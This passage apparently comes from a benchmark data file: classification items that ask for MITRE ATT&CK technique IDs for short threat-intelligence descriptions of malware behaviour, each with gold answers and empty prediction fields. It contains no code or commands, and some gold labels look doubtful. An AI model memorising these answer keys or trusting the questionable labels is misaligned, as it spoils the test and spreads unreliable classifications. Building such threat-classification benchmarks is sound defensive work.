T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n\t - T1552.006: Unsecured Credentials - Group Policy Preferences\n\t - T1003.004: OS Credential Dumping - LSA Secrets\n\t - T1588.002: Obtain Capabilities - Tool\n", "input": "\nCTU researchers identified BRONZE UNION actors using a file named ms.exe that was likely a credential-abuse tool from the Kekeo toolset", "gold": "- T1036: Masquerading", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Remcos can capture data from the system\u2019s microphone.\n\t - T1123: Audio Capture\n- Text: Once explorer.exe is running, the service configures the environment and executes the C2 contact module: winprint32.exe. This module is responsible for launching the document search module, contact the C2 and exfiltrate the collected documents\n\t - T1020: Automated Exfiltration\n\t - T1041: Exfiltration Over C2 Channel\n- Text: LightNeuron can be configured to automatically exfiltrate files under a specified directory.\n\t - T1020: Automated Exfiltration\n", "input": "\ncaptured audio and sent it out to a C2 server.", "gold": "- T1123: Audio Capture", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The spreadsheet also creates a scheduled task named \"windows update check\" that runs the file C:\\Users\\\\.templates\\System Manager.exe every minute.\n\t - T1053: Scheduled Task/Job\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n- Text: First-stage analysis . When the user opens the phishing email, it presents a Spanish social engineering message (\"Payment: Find scheduled payment dates attached\"). The figure below shows a screenshot of one of the emails we looked at. It decrypts the URL for the second-stage from hardcoded bytes, saves it to the \"Templates\" folder, and executes it. Second-stage analysis . The second-stage executable is packed with a Delphi-based packer. The DLL sets a timer, as shown below, which will execute the downloader function periodically. The DLL decodes the hex string using the following steps: We have written a small Python script to decrypt the third stage. The same decryption method was also used to decrypt the hardcoded command and control (C2).The resulting file is also a DLL, which the second stage reflectively loads. Injected DLL analysis (UAC bypass using two techniques) . It checks if `C:\\Windows\\Finex` exists. Decrypting and executing Lokibot . After attempting to bypass the UAC, the third-stage DLL will check if `AutoRunKeyFlag` is set. For this DLL, it is not set. This dropper uses three stages and three layers of encryption to hide its final payload\n\t - T1053: Scheduled Task/Job\n- Text: CrackMapExec can set a scheduled task on the target system to execute commands remotely using at.\n\t - T1053.002: Scheduled Task/Job - At\n", "input": "\ncreates a scheduled task on the system that provides persistence.", "gold": "- T1053.005: Scheduled Task/Job - Scheduled Task", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: PlugX has a module to create, delete, or modify Registry keys.\n\t - T1112: Modify Registry\n- Text: MCMD has the ability to remove set Registry Keys, including those used for persistence.\n\t - T1070.009: Indicator Removal - Clear Persistence\n- Text: removes logs from /var/logs and /Library/logs.\n\t - T1070: Indicator Removal\n", "input": "\nDeletion of all registry keys associated with the extraction of the SFX RAR Deletion of the User Assist Key entries related to applications that have been recently executed Deletion of all registry keys relating to services that have recently run Clearly the attacker using this PlugX is paranoid about it being detected on disk, both in the registry and the file system", "gold": "- T1112: Modify Registry\n- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n- T1012: Query Registry", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: can be configured to use HTTP or DNS for command and control.\n\t - T1071: Application Layer Protocol\n- Text: Micropsia uses HTTP and HTTPS for C2 network communications.\n\t - T1071.001: Application Layer Protocol - Web Protocols\n- Text: ShadowPad has used FTP for C2 communications.\n\t - T1071.002: Application Layer Protocol - File Transfer Protocols\n", "input": "\nAvailable Commands The XAgent C2 server will provide commands for the Trojan to run on the compromised system within its response to inbound HTTP request", "gold": "- T1071: Application Layer Protocol\n- T1059: Command and Scripting Interpreter", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: A variant uses fake TLS to communicate with the C2 server.\n\t - T1095: Non-Application Layer Protocol\n- Text: Derusbi has used unencrypted HTTP on port 443 for C2.\n\t - T1571: Non-Standard Port\n- Text: provides a reverse shell is triggered upon receipt of a packet with a special string, sent to any port.\n\t - T1205.001: Traffic Signaling - Port Knocking\n", "input": "\nbinds to a raw socket on a random source port between 31800 and 31900 for C2.", "gold": "- T1095: Non-Application Layer Protocol", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: can obtain information on installed anti-malware programs.\n\t - T1518.001: Software Discovery - Security Software Discovery\n- Text: This system configuration file (in.sys) will drop a backdoor installer (UserInstall.exe) then delete itself\n\t - T1070.004: Indicator Removal - File Deletion\n- Text: 4H RAT has the capability to obtain a listing of running processes (including loaded modules).\n\t - T1057: Process Discovery\n", "input": "\nchecks for the presence of certain security-related processes and deletes its installer/uninstaller component if it identifies any of them.", "gold": "- T1518.001: Software Discovery - Security Software Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Aquatic Panda has used WinRAR to compress memory dumps prior to exfiltration.\n\t - T1560.001: Archive Collected Data - Archive via Utility\n- Text: has compressed data into password-protected RAR archives prior to exfiltration.\n\t - T1560: Archive Collected Data\n- Text: BADFLICK has compressed data using the aPLib compression library.\n\t - T1560.002: Archive Collected Data - Archive via Library\n", "input": "\nwill zip up the /Library/Keychains directory before exfiltrating it.", "gold": "- T1560: Archive Collected Data", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Gazer communicates with its C2 servers over HTTP.\n\t - T1071.001: Application Layer Protocol - Web Protocols\n- Text: Mapping of TG-3390's interactions with web shells during an intrusion responded to by CTU researchers\n\t - T1505.003: Server Software Component - Web Shell\n- Text: IceApple is an IIS post-exploitation framework, consisting of 18 modules that provide several functionalities.\n\t - T1505.004: Server Software Component - IIS Components\n", "input": "\nIts C2 is based on IIS using .asp technology to handle the victims\u2019 HTTP requests", "gold": "- T1071: Application Layer Protocol", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: RunningRAT adds itself to the Registry key \"Software\\Microsoft\\Windows\\CurrentVersion\\Run\" to establish persistence upon reboot.\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n- Text: At the time of discovery TEARDROP was a novel concoction: never-before-seen, possibly even tailor-made for this attack. TEARDROP runs in-memory but it does register a Windows service, which involves editing the registry\n\t - T1112: Modify Registry\n- Text: xCaon has added persistence via the Registry key \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\load\" which causes the malware to run each time any user logs in.\n\t - T1547: Boot or Logon Autostart Execution\n", "input": "\npersists by creating a Registry entry in HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\.", "gold": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: HermeticWizard has the ability to create a new process using `rundll32`.\n\t - T1218.011: System Binary Proxy Execution - Rundll32\n- Text: achieves persistence by creating a shortcut in the current user's Startup folder.\n\t - T1547.009: Boot or Logon Autostart Execution - Shortcut Modification\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n- Text: uses search order hijacking of the Windows executable sysprep.exe to escalate privileges.\n\t - T1574.001: Hijack Execution Flow - DLL Search Order Hijacking\n", "input": "\nThe built-in Windows utility rundll32.exe is then used to load this DLL by the original .lnk file", "gold": "- T1218.011: System Binary Proxy Execution - Rundll32\n- T1547.009: Boot or Logon Autostart Execution - Shortcut Modification", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: collects the system name, OS version including service pack, and system install date and sends the information to the C2 server.\n\t - T1082: System Information Discovery\n- Text: MacMa can use Core Graphics Event Taps to intercept user keystrokes from any text input field and saves them to text files. Text input fields include Spotlight, Finder, Safari, Mail, Messages, and other apps that have text fields for passwords.\n\t - T1056.001: Input Capture - Keylogging\n- Text: Lokibot has demonstrated the ability to steal credentials from multiple applications and data sources including Safari and the Chromium and Mozilla Firefox-based web browsers.\n\t - T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n", "input": "\nThe adversaries can get detailed information about the victim's machine, as you can see in the screenshot below.Beside the system information, it steals passwords from common web browsers, Filezilla, Beyluxe Messenger, CoreFTP and the video game \"Minecraft.\" It also starts a keylogger, steals clipboard content, takes screenshots from the desktop and pictures from the webcam", "gold": "- T1113: Screen Capture\n- T1003: OS Credential Dumping\n- T1082: System Information Discovery\n- T1125: Video Capture", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: SUNSPOT enumerated the Orion software Visual Studio solution directory path.\n\t - T1083: File and Directory Discovery\n- Text: ccf32 can collect files from a compromised host.\n\t - T1005: Data from Local System\n- Text: Actors likely used net share command to display information about shared resources on the local computer and decide which directories to exploit, the powershell dir command to map shared drives to a specified path and retrieve items from another, and the ntfsinfo command to search network shares on computers they have compromised to find files of interest. The actors used dir.exe to display a list of a directory's files and subdirectories matching a certain text string.\n\t - T1039: Data from Network Shared Drive\n", "input": "\ncan search files on a victim.", "gold": "- T1083: File and Directory Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Chinese state-sponsored cyber actors were observed creating a new sign-in policy to bypass MFA requirements to maintain access to the victim network.\n\t - T1556.001: Modify Authentication Process - Domain Controller Authentication\n- Text: APT3 has been known to add created accounts to local admin groups to maintain elevated access.\n\t - T1098: Account Manipulation\n- Text: The threat actor accomplished this by using administrative accounts to connect via SMB to targeted users, and then copy their Chrome profile directories as well as data protection API (DPAPI) data\n\t - T1003.006: OS Credential Dumping - DCSync\n", "input": "\nThe credential dumper has been extended to include Skeleton Key domain controller authentication bypass functionality. The LSADUMP::ChangeNTLM and LSADUMP::SetNTLM modules can also manipulate the password hash of an account without knowing the clear text value.", "gold": "- T1098: Account Manipulation", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: EVILNUM has a function called \"DeleteLeftovers\" to remove certain artifacts of the attack.\n\t - T1070: Indicator Removal\n- Text: contains a cleanup module that removes traces of itself from the victim.\n\t - T1070.004: Indicator Removal - File Deletion\n- Text: Bazar's loader can delete scheduled tasks created by a previous instance of the malware.\n\t - T1070: Indicator Removal\n\t - T1070.009: Indicator Removal - Clear Persistence\n", "input": "\nremoved certain files and replaced them so they could not be retrieved.", "gold": "- T1070.004: Indicator Removal - File Deletion", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The threat actor gave considerable effort to obfuscating the code of this new Anchor_DNS variant using stack strings, string encryption, and by implementing a packer. The following example shows considerable changes in the code of the WinMain() function between an older variant of Anchor_DNS and the new variant\n\t - T1027: Obfuscated Files or Information\n- Text: The UprotectData() method treats the first two bytes of the Base64 decoded value as a two-byte XOR key\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n\t - T1560.003: Archive Collected Data - Archive via Custom Method\n- Text: Malware uses xor key [0x09, 0xff, 0x20] to decrypt content in .data section and get string \u201caHR0cDovLzUxLjE1LjE5Ni4zMC8xL2luZGV4LnBocA\u201d. Then malware does base64 decoding to get the C2 address\n\t - T1140: Deobfuscate/Decode Files or Information\n", "input": "\nA configuration file is encrypted with a simple XOR key, 0x53.", "gold": "- T1027: Obfuscated Files or Information", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: APT32 has set up and operated websites to gather information and deliver malware.\n\t - T1583.001: Acquire Infrastructure - Domains\n- Text: Earth Lusca has acquired and used a variety of open source tools.\n\t - T1588.002: Obtain Capabilities - Tool\n- Text: For C0010, UNC3890 actors staged tools on their infrastructure to download directly onto a compromised system.\n\t - T1608.002: Stage Capabilities - Upload Tool\n", "input": "\nThis group was observed using tactics such as registering typosquatting domains for security or technology vendors, abusing open-source penetration testing tools, and leveraging novel file types as anti-analysis techniques", "gold": "- T1518.001: Software Discovery - Security Software Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The BazarLoader ISO downloaded from the OneDrive link, consists of a malicious DLL and shortcut file named \u201cDocuments.lnk\u201d which executes the DLL via rundll32.exe.\n\t - T1218.011: System Binary Proxy Execution - Rundll32\n- Text: build_downer has the ability to add itself to the Registry Run key for persistence.\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n- Text: Turla established persistence by adding a Shell value under the Registry key \"HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\".\n\t - T1547.004: Boot or Logon Autostart Execution - Winlogon Helper DLL\n", "input": "\nhas used rundll32.exe in a Registry value to establish persistence.", "gold": "- T1218.011: System Binary Proxy Execution - Rundll32", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: sifo \u2013 Collect victim system information - drive \u2013 List drives on victim machine - list \u2013 List file information for provided directory - upload \u2013 Upload a file to the victim machine - open \u2013 Spawn a command shell\n\t - T1082: System Information Discovery\n\t - T1083: File and Directory Discovery\n\t - T1105: Ingress Tool Transfer\n\t - T1082: System Information Discovery\n\t - T1083: File and Directory Discovery\n- Text: APT29 has used encoded PowerShell scripts uploaded to CozyCar installations to download and install SeaDuke. APT29 also used PowerShell to create new tasks on remote machines, identify configuration settings, evade defenses, exfiltrate data, and to execute other commands.\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n- Text: MuddyWater has used one C2 to obtain enumeration scripts and monitor web logs, but a different C2 to send data back.\n\t - T1104: Multi-Stage Channels\n", "input": "\nHAYMAKER is a backdoor that can download and execute additional payloads in the form of modules", "gold": "- T1105: Ingress Tool Transfer", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: APT39 leveraged spearphishing emails with malicious attachments to initially compromise victims.\n\t - T1566.001: Phishing - Spearphishing Attachment\n- Text: The credential harvesting attacks used spear-phishing emails that contained malicious Microsoft Office documents that leveraged the \u201cattachedTemplate\u201d technique to load a template from a remote server\n\t - T1598.002: Phishing for Information - Spearphishing Attachment\n- Text: Dragonfly has used various forms of spearphishing in attempts to get users to open malicious attachments.\n\t - T1204.002: User Execution - Malicious File\n", "input": "\nLike past attacks, the initial infection vector is a malicious Word document attached to a phishing email that is well-tailored to the targeted business and its day-to-day operations", "gold": "- T1598.002: Phishing for Information - Spearphishing Attachment", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The attackers typically distribute Netwalker ransomware with the use of a reflective PowerShell loader script that has been protected from casual analysis with several layers of obfuscation.\n\t - T1059: Command and Scripting Interpreter\n\t - T1064: Scripting\n- Text: OceanSalt can delete files from the system.\n\t - T1070.004: Indicator Removal - File Deletion\n- Text: Should a removable drive be discovered, the plugin will seek any files residing on this device based on the plugin\u2019s configured list. In this particular instance, the malware will seek out the following file types\n\t - T1119: Automated Collection\n", "input": "\nexecutes batch scripts on the victim\u2019s machine.", "gold": "- T1064: Scripting", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: APT39 has used remote access tools that leverage DNS in communications with C2.\n\t - T1071.004: Application Layer Protocol - DNS\n- Text: OilRig has used the Plink utility and other tools to create tunnels to C2 servers.\n\t - T1572: Protocol Tunneling\n- Text: Felismus uses HTTP for C2.\n\t - T1071.001: Application Layer Protocol - Web Protocols\n", "input": "\nThe Poison Frog server handles both the HTTP and DNS tunneling channels used by the hUpdater.ps1 and dUpdater.ps1 scripts", "gold": "- T1071: Application Layer Protocol", "predicted": "" } ]